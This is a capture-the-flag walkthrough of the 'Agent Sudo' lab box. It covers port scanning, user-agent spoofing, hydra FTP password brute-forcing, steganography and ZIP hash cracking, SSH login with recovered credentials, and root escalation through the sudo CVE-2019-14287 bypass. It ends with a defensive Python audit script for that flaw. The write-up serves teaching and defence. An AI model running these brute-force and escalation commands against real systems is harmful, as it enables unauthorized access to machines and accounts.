Agent Sudo
1. Reconnaissance:
export TARGET_IP=10.10.17.101
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65318 closed tcp ports (reset), 214 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
2. HTTP Service Analysis:
Navigating to http://$TARGET_IP/ reveals the following message:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
This suggests that the website utilizes user-agent filtering. The message implies that valid user-agents might correspond to agent codenames.
3. User-Agent Enumeration:
The initial hypothesis is that agent codenames correspond to single letters of the alphabet. curl is used to spoof the user-agent and identify a valid codename.
curl -A "R" -L $TARGET_IP
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
This message suggests "R" is not a valid user-agent.
curl -A "C" -L $TARGET_IP
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R
This reveals a username, "chris," and suggests his password might be weak.
4. FTP Password Cracking:
hydra -V -l "chris" -P /usr/share/wordlists/rockyou.txt ftp://$TARGET_IP -f
Hydra successfully identifies the password:
[21][ftp] host: 10.10.17.101 login: chris password: crystal
5. FTP Access and File Retrieval:
FTP is used to connect to the target with the discovered credentials and retrieve all files.
ftp $TARGET_IP # Credentials: `chris:crystal`
ftp> mget * # Download everything
The contents of To_agentJ.txt are examined:
cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
This message indicates a steganography challenge. Agent J's password is hidden within cutie.png.
6. Steganography and ZIP Extraction:
binwalk is used to analyze cutie.png for embedded data.
binwalk -e cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
WARNING: One or more files failed to extract: either no utility was found or it's unimplemented
Binwalk reveals an embedded, password-protected ZIP archive. The zip2john tool is then used to convert the archive into a hash that john can crack.
cd _cutie.png.extracted
zip2john 8702.zip > hash && john --wordlist=/usr/share/wordlists/rockyou.txt hash # alien
7z e 8702.zip
The password "alien" is recovered. The archive 8702.zip is extracted using 7zip, and the extracted file To_agentR.txt is read.
cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
The base64 encoded string "QXJlYTUx" is decoded to "Area51".
echo "QXJlYTUx" | base64 -d # Area51
The string "Area51" is likely another password.
7. Steghide Extraction and User Password Retrieval:
steghide extract -sf cute-alien.jpg # Password: Area51
cat message.txt
The extracted message.txt reveals the password for user "james":
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
8. SSH Access and Privilege Escalation Assessment:
ssh james@$TARGET_IP # Password: hackerrules!
id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
The output of id confirms successful login as "james" and reveals that he is a member of the sudo group.
The file Alien_autospy.jpg is downloaded for further analysis.
scp james@$TARGET_IP:~/Alien_autospy.jpg . # Password: hackerrules!
An online image search identifies the photo as being from the Roswell alien autopsy.
The sudo -l command is used to determine what commands "james" can execute with elevated privileges.
sudo -l
(ALL, !root) /bin/bash
The output indicates that "james" can run /bin/bash as any user except root. The restriction relies on a "!root" negation in the Runas list, and that negation is exactly what a known vulnerability in sudo versions prior to 1.8.28 (CVE-2019-14287) sidesteps. Upgrading sudo to 1.8.28 or later closes the bug.
sudo --version # Sudo version 1.8.21p2
9. Privilege Escalation (CVE-2019-14287):
The vulnerability allows specifying a user ID of -1, which sudo ends up treating as user ID 0 (root): the value does not match the excluded root entry in the Runas list, but the underlying setresuid() calls interpret -1 as "leave unchanged", so the command keeps the uid 0 that sudo itself runs with.
sudo -u#-1 /bin/bash
id # uid=0(root) gid=1000(james) groups=1000(james)
The id command confirms that the shell is now running as root.
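The two conditions described in sections 8 and 9 (a sudo release older than 1.8.28 and a Runas list that relies on "!root" negation) are what an administrator would check for on their own hosts. The following audit script is an added example, not part of the original writeup; the sudoers excerpt and version banner it uses are constructed to mirror this box.

```python
import re

# sudo 1.8.28 is the release that fixed CVE-2019-14287 (see section 8).
FIXED_VERSION = (1, 8, 28)

def parse_sudo_version(banner):
    """Extract (major, minor, patch) from the first line of `sudo --version`.
    A trailing 'pN' patch-level suffix (e.g. 1.8.21p2) is deliberately
    ignored: it never lifts a release up to the fixed version."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("unrecognised sudo version banner: %r" % banner)
    return tuple(int(x) for x in m.groups())

def version_is_vulnerable(banner):
    return parse_sudo_version(banner) < FIXED_VERSION

# One sudoers rule: user  host = (runas_users[:runas_groups])  command
RUNAS_RE = re.compile(r"^\s*(\S+)\s+\S+\s*=\s*\(([^)]*)\)\s*(.*)$")

def negated_runas_rules(sudoers_text):
    """Return (user, runas_list, command) for every rule whose Runas list
    relies on a '!' negation, e.g. '(ALL, !root)'. Each hit is a rule to
    rewrite as an explicit allow-list of target users instead."""
    hits = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank line or full-line comment
        m = RUNAS_RE.match(line)
        if m and "!" in m.group(2):
            hits.append((m.group(1), m.group(2).strip(), m.group(3).strip()))
    return hits

def audit(banner, sudoers_text):
    """The host is exposed when both conditions from the writeup hold."""
    return version_is_vulnerable(banner) and bool(negated_runas_rules(sudoers_text))

# Constructed inputs mirroring the box: the version banner quoted in
# section 8 and a sudoers fragment that would yield its `sudo -l` output.
SAMPLE_BANNER = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SAMPLE_SUDOERS = """\
# constructed sudoers excerpt
root    ALL=(ALL:ALL) ALL
james   ALL=(ALL, !root) /bin/bash
"""

if __name__ == "__main__":
    for rule in negated_runas_rules(SAMPLE_SUDOERS):
        print("negated Runas rule:", rule)
    print("exposed:", audit(SAMPLE_BANNER, SAMPLE_SUDOERS))
```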